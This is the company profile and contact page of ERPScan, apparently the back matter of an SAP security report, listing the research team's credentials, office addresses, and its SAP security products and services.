ABOUT ERPSCAN RESEARCH TEAMThe company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulner-ability research and analysis of critical enterprise applications. It has achieved multiple acknowledg-ments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for exposing in excess of 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proudly to expose new types of vulnerabilities (TOP 10 Web hacking tech-niques 2012) and were nominated for best server-side vulnerability in BlackHat 2013.

ERPScan experts have been invited to speak, present and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB as well as private trainings for SAP in several Fortune 2000 companies.

ERPScan researchers lead project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP Security. ERPScan experts have been interviewed by leading media resources and specialized info-sec publications worldwide, these include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise and Chinabyte to name a few.

We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience, to conduct research in SAP system security.


OUR CONTACTSUS Office:

Mail to: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

EMEA Headquarters

Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

Phone: +31 20 8932892

Twitter: @erpscan

Web: www.erpscan.com

Contact: [email protected]

PR: [email protected]

Products

• ERPScan Security Monitoring Suite for SAP

• ERPScan Security Scanner for SAP

• ERPScan Security Monitoring Suite for Oracle PeopleSoft

• SAP Code Security as a Service

Services

• SAP Vulnerability Assessment

• SAP Security Audit

• SAP Security Trainings

• ABAP code security review

• SAP Penetration testing

https://twitter.com/erpscan

http://www.erpscan.com

mailto:[email protected]

mailto:press%40erpscan.com?subject=

http://erpscan.com/products/erpscan-security-monitoring-suite-for-sap/

http://erpscan.com/products/erpscan-security-scanner-for-sap/

http://erpscan.com/products/erpscan-add-on-for-peoplesoft/

https://erpscan.com/products/sap-code-security-scan-service/

https://erpscan.com/services-2/sap-vulnerability-assessment/

https://erpscan.com/services-2/sap-security-audit/

https://erpscan.com/services-2/sap-security-trainings/

https://erpscan.com/services-2/abap-code-review-security-scan/

https://erpscan.com/services-2/sap-penetration-testing/